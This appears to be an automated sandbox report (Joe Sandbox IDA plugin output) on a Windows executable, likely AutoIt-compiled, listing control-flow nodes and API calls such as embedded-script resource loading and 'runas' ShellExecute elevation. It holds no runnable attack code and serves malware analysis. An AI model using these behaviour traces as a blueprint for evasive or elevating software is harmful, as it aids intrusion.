97239->97208 97240->97204 97241->97211 97242->97213 97243->97216 97244->97194 97245->97197 97246->97201 97247->97220 97248->97222 97253 54d1f6 97249->97253 97252 532cbd 8 API calls 3 library calls 97252->97227 97256 54d213 97253->97256 97257 54d20f 97253->97257 97254 530a8c CatchGuardHandler 5 API calls 97255 52fed8 97254->97255 97255->97225 97255->97252 97256->97257 97259 544bfb 97256->97259 97257->97254 97260 544c07 ___scrt_is_nonwritable_in_current_image 97259->97260 97271 542f5e EnterCriticalSection 97260->97271 97262 544c0e 97272 5450af 97262->97272 97264 544c1d 97270 544c2c 97264->97270 97285 544a8f 29 API calls 97264->97285 97267 544c27 97286 544b45 GetStdHandle GetFileType 97267->97286 97268 544c3d __fread_nolock 97268->97256 97287 544c48 LeaveCriticalSection _abort 97270->97287 97271->97262 97273 5450bb ___scrt_is_nonwritable_in_current_image 97272->97273 97274 5450df 97273->97274 97275 5450c8 97273->97275 97288 542f5e EnterCriticalSection 97274->97288 97296 53f2d9 20 API calls _free 97275->97296 97278 5450cd 97297 5427ec 26 API calls ___std_exception_copy 97278->97297 97280 545117 97298 54513e LeaveCriticalSection _abort 97280->97298 97281 5450d7 __fread_nolock 97281->97264 97282 5450eb 97282->97280 97289 545000 97282->97289 97285->97267 97286->97270 97287->97268 97288->97282 97290 544c7d pre_c_initialization 20 API calls 97289->97290 97291 545012 97290->97291 97295 54501f 97291->97295 97299 543405 11 API calls 2 library calls 97291->97299 97292 5429c8 _free 20 API calls 97294 545071 97292->97294 97294->97282 97295->97292 97296->97278 97297->97281 97298->97281 97299->97291 97301 53096c GetStartupInfoW 97300->97301 97301->97239 97302 511098 97307 5142de 97302->97307 97306 5110a7 97308 51a961 22 API calls 97307->97308 97309 5142f5 GetVersionExW 97308->97309 97310 516b57 22 API calls 97309->97310 97311 514342 97310->97311 97312 5193b2 22 API calls 97311->97312 97324 514378 97311->97324 97313 51436c 97312->97313 97315 5137a0 22 API calls 97313->97315 97314 
51441b GetCurrentProcess IsWow64Process 97316 514437 97314->97316 97315->97324 97317 553824 GetSystemInfo 97316->97317 97318 51444f LoadLibraryA 97316->97318 97319 514460 GetProcAddress 97318->97319 97320 51449c GetSystemInfo 97318->97320 97319->97320 97322 514470 GetNativeSystemInfo 97319->97322 97323 514476 97320->97323 97321 5537df 97322->97323 97325 51109d 97323->97325 97326 51447a FreeLibrary 97323->97326 97324->97314 97324->97321 97327 5300a3 29 API calls __onexit 97325->97327 97326->97325 97327->97306 97328 51105b 97333 51344d 97328->97333 97330 51106a 97364 5300a3 29 API calls __onexit 97330->97364 97332 511074 97334 51345d __wsopen_s 97333->97334 97335 51a961 22 API calls 97334->97335 97336 513513 97335->97336 97337 513a5a 24 API calls 97336->97337 97338 51351c 97337->97338 97365 513357 97338->97365 97341 5133c6 22 API calls 97342 513535 97341->97342 97343 51515f 22 API calls 97342->97343 97344 513544 97343->97344 97345 51a961 22 API calls 97344->97345 97346 51354d 97345->97346 97347 51a6c3 22 API calls 97346->97347 97348 513556 RegOpenKeyExW 97347->97348 97349 553176 RegQueryValueExW 97348->97349 97353 513578 97348->97353 97350 553193 97349->97350 97351 55320c RegCloseKey 97349->97351 97352 52fe0b 22 API calls 97350->97352 97351->97353 97361 55321e _wcslen 97351->97361 97354 5531ac 97352->97354 97353->97330 97356 515722 22 API calls 97354->97356 97355 514c6d 22 API calls 97355->97361 97357 5531b7 RegQueryValueExW 97356->97357 97358 5531d4 97357->97358 97360 5531ee messages 97357->97360 97359 516b57 22 API calls 97358->97359 97359->97360 97360->97351 97361->97353 97361->97355 97362 519cb3 22 API calls 97361->97362 97363 51515f 22 API calls 97361->97363 97362->97361 97363->97361 97364->97332 97366 551f50 __wsopen_s 97365->97366 97367 513364 GetFullPathNameW 97366->97367 97368 513386 97367->97368 97369 516b57 22 API calls 97368->97369 97370 5133a4 97369->97370 97370->97341 97371 5490fa 97372 549107 97371->97372 97376 54911f 97371->97376 97421 53f2d9 20 API 
calls _free 97372->97421 97374 54910c 97422 5427ec 26 API calls ___std_exception_copy 97374->97422 97377 54917a 97376->97377 97383 549117 97376->97383 97423 54fdc4 21 API calls 2 library calls 97376->97423 97378 53d955 __fread_nolock 26 API calls 97377->97378 97380 549192 97378->97380 97391 548c32 97380->97391 97382 549199 97382->97383 97384 53d955 __fread_nolock 26 API calls 97382->97384 97385 5491c5 97384->97385 97385->97383 97386 53d955 __fread_nolock 26 API calls 97385->97386 97387 5491d3 97386->97387 97387->97383 97388 53d955 __fread_nolock 26 API calls 97387->97388 97389 5491e3 97388->97389 97390 53d955 __fread_nolock 26 API calls 97389->97390 97390->97383 97392 548c3e ___scrt_is_nonwritable_in_current_image 97391->97392 97393 548c46 97392->97393 97394 548c5e 97392->97394 97425 53f2c6 20 API calls _free 97393->97425 97396 548d24 97394->97396 97400 548c97 97394->97400 97432 53f2c6 20 API calls _free 97396->97432 97397 548c4b 97426 53f2d9 20 API calls _free 97397->97426 97403 548ca6 97400->97403 97404 548cbb 97400->97404 97401 548d29 97433 53f2d9 20 API calls _free 97401->97433 97402 548c53 __fread_nolock 97402->97382 97427 53f2c6 20 API calls _free 97403->97427 97424 545147 EnterCriticalSection 97404->97424 97408 548cc1 97410 548cf2 97408->97410 97411 548cdd 97408->97411 97409 548cab 97428 53f2d9 20 API calls _free 97409->97428 97415 548d45 __fread_nolock 38 API calls 97410->97415 97429 53f2d9 20 API calls _free 97411->97429 97418 548ced 97415->97418 97416 548cb3 97434 5427ec 26 API calls ___std_exception_copy 97416->97434 97417 548ce2 97430 53f2c6 20 API calls _free 97417->97430 97431 548d1c LeaveCriticalSection __wsopen_s 97418->97431 97421->97374 97422->97383 97423->97377 97424->97408 97425->97397 97426->97402 97427->97409 97428->97416 97429->97417 97430->97418 97431->97402 97432->97401 97433->97416 97434->97402 97435 51f7bf 97436 51f7d3 97435->97436 97437 51fcb6 97435->97437 97439 51fcc2 97436->97439 97440 52fddb 22 API calls 97436->97440 97528 51aceb 23 
API calls messages 97437->97528 97529 51aceb 23 API calls messages 97439->97529 97442 51f7e5 97440->97442 97442->97439 97443 51fd3d 97442->97443 97444 51f83e 97442->97444 97530 581155 22 API calls 97443->97530 97468 51ed9d messages 97444->97468 97470 521310 97444->97470 97447 51fef7 97454 51a8c7 22 API calls 97447->97454 97447->97468 97449 52fddb 22 API calls 97467 51ec76 messages 97449->97467 97451 564600 97456 51a8c7 22 API calls 97451->97456 97451->97468 97452 564b0b 97532 58359c 82 API calls __wsopen_s 97452->97532 97454->97468 97456->97468 97458 51a8c7 22 API calls 97458->97467 97459 530242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97459->97467 97460 51fbe3 97462 564bdc 97460->97462 97460->97468 97469 51f3ae messages 97460->97469 97461 51a961 22 API calls 97461->97467 97533 58359c 82 API calls __wsopen_s 97462->97533 97464 564beb 97534 58359c 82 API calls __wsopen_s 97464->97534 97465 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97465->97467 97466 5300a3 29 API calls pre_c_initialization 97466->97467 97467->97447 97467->97449 97467->97451 97467->97452 97467->97458 97467->97459 97467->97460 97467->97461 97467->97464 97467->97465 97467->97466 97467->97468 97467->97469 97526 5201e0 235 API calls 2 library calls 97467->97526 97527 5206a0 41 API calls messages 97467->97527 97469->97468 97531 58359c 82 API calls __wsopen_s 97469->97531 97471 5217b0 97470->97471 97472 521376 97470->97472 97644 530242 5 API calls __Init_thread_wait 97471->97644 97474 521390 97472->97474 97475 566331 97472->97475 97535 521940 97474->97535 97649 59709c 235 API calls 97475->97649 97477 5217ba 97480 5217fb 97477->97480 97483 519cb3 22 API calls 97477->97483 97479 56633d 97479->97467 97485 566346 97480->97485 97487 52182c 97480->97487 97482 521940 9 API calls 97484 5213b6 97482->97484 97491 5217d4 97483->97491 97484->97480 97486 5213ec 97484->97486 97650 58359c 82 API calls 
__wsopen_s 97485->97650 97486->97485 97510 521408 __fread_nolock 97486->97510 97646 51aceb 23 API calls messages 97487->97646 97490 521839 97647 52d217 235 API calls 97490->97647 97645 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97491->97645 97494 56636e 97651 58359c 82 API calls __wsopen_s 97494->97651 97495 52152f 97497 5663d1 97495->97497 97498 52153c 97495->97498 97653 595745 54 API calls _wcslen 97497->97653 97500 521940 9 API calls 97498->97500 97501 521549 97500->97501 97504 5664fa 97501->97504 97506 521940 9 API calls 97501->97506 97502 52fddb 22 API calls 97502->97510 97503 52fe0b 22 API calls 97503->97510 97514 566369 97504->97514 97654 58359c 82 API calls __wsopen_s 97504->97654 97505 521872 97648 52faeb 23 API calls 97505->97648 97512 521563 97506->97512 97509 51ec40 235 API calls 97509->97510 97510->97490 97510->97494 97510->97495 97510->97502 97510->97503 97510->97509 97511 5663b2 97510->97511 97510->97514 97652 58359c 82 API calls __wsopen_s 97511->97652 97512->97504 97515 51a8c7 22 API calls 97512->97515 97517 5215c7 messages 97512->97517 97514->97467 97515->97517 97516 521940 9 API calls 97516->97517 97517->97504 97517->97505 97517->97514 97517->97516 97520 52167b messages 97517->97520 97545 586ef1 97517->97545 97625 59958b 97517->97625 97628 59959f 97517->97628 97631 58f0ec 97517->97631 97640 57d4ce 97517->97640 97518 52171d 97518->97467 97520->97518 97643 52ce17 22 API calls messages 97520->97643 97526->97467 97527->97467 97528->97439 97529->97443 97530->97468 97531->97468 97532->97468 97533->97464 97534->97468 97536 521981 97535->97536 97540 52195d 97535->97540 97655 530242 5 API calls __Init_thread_wait 97536->97655 97539 52198b 97539->97540 97656 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97539->97656 97544 5213a0 97540->97544 97657 530242 5 API calls __Init_thread_wait 97540->97657 97541 528727 97541->97544 97658 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 
97541->97658 97544->97482 97546 51a961 22 API calls 97545->97546 97547 586f1d 97546->97547 97548 51a961 22 API calls 97547->97548 97549 586f26 97548->97549 97550 586f3a 97549->97550 97833 51b567 39 API calls 97549->97833 97659 517510 97550->97659 97553 586fbc 97556 517510 53 API calls 97553->97556 97554 5870bf 97555 514ecb 94 API calls 97554->97555 97557 5870d0 97555->97557 97559 586fc8 97556->97559 97561 5870e5 97557->97561 97563 514ecb 94 API calls 97557->97563 97558 586f57 _wcslen 97558->97553 97558->97554 97566 5870e9 97558->97566 97560 586fdb 97559->97560 97562 51a8c7 22 API calls 97559->97562 97568 587027 97560->97568 97570 587005 97560->97570 97574 51a8c7 22 API calls 97560->97574 97564 51a961 22 API calls 97561->97564 97561->97566 97562->97560 97563->97561 97565 58711a 97564->97565 97567 51a961 22 API calls 97565->97567 97566->97517 97569 587126 97567->97569 97571 517510 53 API calls 97568->97571 97573 51a961 22 API calls 97569->97573 97575 5133c6 22 API calls 97570->97575 97572 587034 97571->97572 97576 58703d 97572->97576 97577 587047 97572->97577 97578 58712f 97573->97578 97574->97570 97579 58700f 97575->97579 97580 51a8c7 22 API calls 97576->97580 97834 57e199 GetFileAttributesW 97577->97834 97582 51a961 22 API calls 97578->97582 97583 517510 53 API calls 97579->97583 97580->97577 97585 587138 97582->97585 97586 58701b 97583->97586 97584 587050 97587 587063 97584->97587 97590 514c6d 22 API calls 97584->97590 97588 517510 53 API calls 97585->97588 97589 516350 22 API calls 97586->97589 97592 517510 53 API calls 97587->97592 97597 587069 97587->97597 97591 587145 97588->97591 97589->97568 97590->97587 97682 51525f 97591->97682 97594 5870a0 97592->97594 97835 57d076 57 API calls 97594->97835 97596 587166 97598 514c6d 22 API calls 97596->97598 97597->97566 97599 587175 97598->97599 97600 5871a9 97599->97600 97602 514c6d 22 API calls 97599->97602 97601 51a8c7 22 API calls 97600->97601 97603 5871ba 97601->97603 97604 587186 97602->97604 97605 516350 22 API 
calls 97603->97605 97604->97600 97606 516b57 22 API calls 97604->97606 97607 5871c8 97605->97607 97608 58719b 97606->97608 97609 516350 22 API calls 97607->97609 97610 516b57 22 API calls 97608->97610 97611 5871d6 97609->97611 97610->97600 97612 516350 22 API calls 97611->97612 97613 5871e4 97612->97613 97614 517510 53 API calls 97613->97614 97615 5871f0 97614->97615 97724 57d7bc 97615->97724 97617 587201 97618 57d4ce 4 API calls 97617->97618 97619 58720b 97618->97619 97620 517510 53 API calls 97619->97620 97624 587239 97619->97624 97621 587229 97620->97621 97778 582947 97621->97778 97623 514f39 68 API calls 97623->97566 97624->97623 97863 597f59 97625->97863 97627 59959b 97627->97517 97629 597f59 120 API calls 97628->97629 97630 5995af 97629->97630 97630->97517 97632 517510 53 API calls 97631->97632 97633 58f126 97632->97633 97955 519e90 97633->97955 97635 58f136 97636 58f15b 97635->97636 97637 51ec40 235 API calls 97635->97637 97639 58f15f 97636->97639 97983 519c6e 22 API calls 97636->97983 97637->97636 97639->97517 97999 57dbbe lstrlenW 97640->97999 97643->97520 97644->97477 97645->97480 97646->97490 97647->97505 97648->97505 97649->97479 97650->97514 97651->97514 97652->97514 97653->97512 97654->97514 97655->97539 97656->97540 97657->97541 97658->97544 97660 517522 97659->97660 97661 517525 97659->97661 97660->97558 97662 51755b 97661->97662 97663 51752d 97661->97663 97665 5550f6 97662->97665 97666 51756d 97662->97666 97673 55500f 97662->97673 97836 5351c6 26 API calls 97663->97836 97839 535183 26 API calls 97665->97839 97837 52fb21 51 API calls 97666->97837 97667 51753d 97672 52fddb 22 API calls 97667->97672 97670 55510e 97670->97670 97674 517547 97672->97674 97675 555088 97673->97675 97677 52fe0b 22 API calls 97673->97677 97676 519cb3 22 API calls 97674->97676 97838 52fb21 51 API calls 97675->97838 97676->97660 97678 555058 97677->97678 97679 52fddb 22 API calls 97678->97679 97680 55507f 97679->97680 97681 519cb3 22 API calls 97680->97681 97681->97675 97683 
51a961 22 API calls 97682->97683 97684 515275 97683->97684 97685 51a961 22 API calls 97684->97685 97686 51527d 97685->97686 97687 51a961 22 API calls 97686->97687 97688 515285 97687->97688 97689 51a961 22 API calls 97688->97689 97690 51528d 97689->97690 97691 553df5 97690->97691 97692 5152c1 97690->97692 97693 51a8c7 22 API calls 97691->97693 97694 516d25 22 API calls 97692->97694 97695 553dfe 97693->97695 97696 5152cf 97694->97696 97697 51a6c3 22 API calls 97695->97697 97698 5193b2 22 API calls 97696->97698 97700 515304 97697->97700 97699 5152d9 97698->97699 97699->97700 97701 516d25 22 API calls 97699->97701 97702 515349 97700->97702 97703 515325 97700->97703 97713 553e20 97700->97713 97705 5152fa 97701->97705 97840 516d25 97702->97840 97703->97702 97708 514c6d 22 API calls 97703->97708 97707 5193b2 22 API calls 97705->97707 97706 51535a 97709 515370 97706->97709 97715 51a8c7 22 API calls 97706->97715 97707->97700 97711 515332 97708->97711 97710 515384 97709->97710 97716 51a8c7 22 API calls 97709->97716 97714 51538f 97710->97714 97718 51a8c7 22 API calls 97710->97718 97711->97702 97717 516d25 22 API calls 97711->97717 97712 516b57 22 API calls 97721 553ee0 97712->97721 97713->97712 97719 51a8c7 22 API calls 97714->97719 97723 51539a 97714->97723 97715->97709 97716->97710 97717->97702 97718->97714 97719->97723 97720 514c6d 22 API calls 97720->97721 97721->97702 97721->97720 97853 5149bd 22 API calls __fread_nolock 97721->97853 97723->97596 97725 57d7d8 97724->97725 97726 57d7f3 97725->97726 97727 57d7dd 97725->97727 97728 51a961 22 API calls 97726->97728 97729 51a8c7 22 API calls 97727->97729 97777 57d7ee 97727->97777 97730 57d7fb 97728->97730 97729->97777 97731 51a961 22 API calls 97730->97731 97732 57d803 97731->97732 97733 51a961 22 API calls 97732->97733 97734 57d80e 97733->97734 97735 51a961 22 API calls 97734->97735 97736 57d816 97735->97736 97737 51a961 22 API calls 97736->97737 97738 57d81e 97737->97738 97739 51a961 22 API calls 97738->97739 97740 57d826 
97739->97740 97741 51a961 22 API calls 97740->97741 97742 57d82e 97741->97742 97743 51a961 22 API calls 97742->97743 97744 57d836 97743->97744 97745 51525f 22 API calls 97744->97745 97746 57d84d 97745->97746 97747 51525f 22 API calls 97746->97747 97748 57d866 97747->97748 97749 514c6d 22 API calls 97748->97749 97750 57d872 97749->97750 97751 57d885 97750->97751 97752 5193b2 22 API calls 97750->97752 97753 514c6d 22 API calls 97751->97753 97752->97751 97754 57d88e 97753->97754 97756 57d89e 97754->97756 97757 5193b2 22 API calls 97754->97757 97755 57d8b0 97759 516350 22 API calls 97755->97759 97756->97755 97758 51a8c7 22 API calls 97756->97758 97757->97756 97758->97755 97760 57d8bb 97759->97760 97855 57d978 22 API calls 97760->97855 97762 57d8ca 97856 57d978 22 API calls 97762->97856 97764 57d8dd 97765 514c6d 22 API calls 97764->97765 97766 57d8e7 97765->97766 97767 57d8fe 97766->97767 97768 57d8ec 97766->97768 97769 514c6d 22 API calls 97767->97769 97770 5133c6 22 API calls 97768->97770 97771 57d907 97769->97771 97772 57d8f9 97770->97772 97773 57d925 97771->97773 97774 5133c6 22 API calls 97771->97774 97775 516350 22 API calls 97772->97775 97776 516350 22 API calls 97773->97776 97774->97772 97775->97773 97776->97777 97777->97617 97779 582954 __wsopen_s 97778->97779 97780 52fe0b 22 API calls 97779->97780 97781 582971 97780->97781 97782 515722 22 API calls 97781->97782 97783 58297b 97782->97783 97784 58274e 27 API calls 97783->97784 97785 582986 97784->97785 97786 51511f 64 API calls 97785->97786 97787 58299b 97786->97787 97788 582a6c 97787->97788 97789 5829bf 97787->97789 97790 582e66 75 API calls 97788->97790 97791 582e66 75 API calls 97789->97791 97806 582a38 97790->97806 97792 5829c4 97791->97792 97797 582a75 messages 97792->97797 97861 53d583 26 API calls 97792->97861 97794 5150f5 40 API calls 97795 582a91 97794->97795 97796 5150f5 40 API calls 97795->97796 97799 582aa1 97796->97799 97797->97624 97798 5829ed 97862 53d583 26 API calls 97798->97862 97800 5150f5 40 

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 0051430D
  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
• GetCurrentProcess.KERNEL32(?,005ACB64,00000000,?,?), ref: 00514422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00514429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00514454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00514474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0051447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 005144A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225

Control-flow Graph
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005150AA,?,?,00000000,00000000), ref: 005142B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005150AA,?,?,00000000,00000000), ref: 005142C9
• LoadResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535BE
• SizeofResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535D3
• LockResource.KERNEL32(005150AA,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20,?), ref: 005535E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
  • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,005D2224), ref: 00552C10
• ShellExecuteW.SHELL32(00000000,?,?,005D2224), ref: 00552C17
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
                                                                                                                        • Opcode ID: 98730347d5b5bd1fce657f2e94f2e3d5840bf669723e37c63e8fe86b9226d005
                                                                                                                        • Instruction ID: f702cb7e64c365209b1356b3a388479cdc678667a0ed7ac8af206a66260bd42c
                                                                                                                        • Opcode Fuzzy Hash: 98730347d5b5bd1fce657f2e94f2e3d5840bf669723e37c63e8fe86b9226d005
                                                                                                                        • Instruction Fuzzy Hash: C411E7311083426AEB14FF20D8699FD7FA4BFE1351F04082EF182421A2CF318AC9D712
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,00555222), ref: 0057DBCE
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0057DBDD
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0057DBEE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057DBFA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2695905019-0
                                                                                                                        • Opcode ID: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                                                                                        • Instruction ID: f0e16c42470e8858e4035df2d2e7cfdca5165d8050b9322c8c5084dd2548bc3d
                                                                                                                        • Opcode Fuzzy Hash: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                                                                                        • Instruction Fuzzy Hash: 36F0A0308109105783216B78AC0D8AA3FBCAF42334B108702F87AC20E0EBB05D58EAA5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: p#^
                                                                                                                        • API String ID: 3964851224-2580200144
                                                                                                                        • Opcode ID: da08b284cfe9d5792e27d6932bb606c7ff6ffc62423d2bc19e3bc892eecc9722
                                                                                                                        • Instruction ID: 180d47d191b079c4de38bfffd8ad49dc2cea871e64a4e535c356fef6e14eddb3
                                                                                                                        • Opcode Fuzzy Hash: da08b284cfe9d5792e27d6932bb606c7ff6ffc62423d2bc19e3bc892eecc9722
                                                                                                                        • Instruction Fuzzy Hash: 0DA26B706083419FD714DF18C484B6ABFE1BF89304F14896DE89A9B392D772EC85CB92
                                                                                                                        APIs
                                                                                                                        • GetInputState.USER32 ref: 0051D807
                                                                                                                        • timeGetTime.WINMM ref: 0051DA07
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB28
                                                                                                                        • TranslateMessage.USER32(?), ref: 0051DB7B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0051DB89
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0051DBB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2189390790-0
                                                                                                                        • Opcode ID: 84032f4830fc25d687439e4001965fa2da576e7e0db77a18d3186251d6427bb1
                                                                                                                        • Instruction ID: fd57dc7d5e94747b1b16466e0e835fa13b7976316c91f25d005dd059956decd9
                                                                                                                        • Opcode Fuzzy Hash: 84032f4830fc25d687439e4001965fa2da576e7e0db77a18d3186251d6427bb1
                                                                                                                        • Instruction Fuzzy Hash: EE42C5706087429FE728CF24C888BAABFF4BF95304F14495DE4958B291D774E884DFA2

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00512D07
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00512D31
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00512D85
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
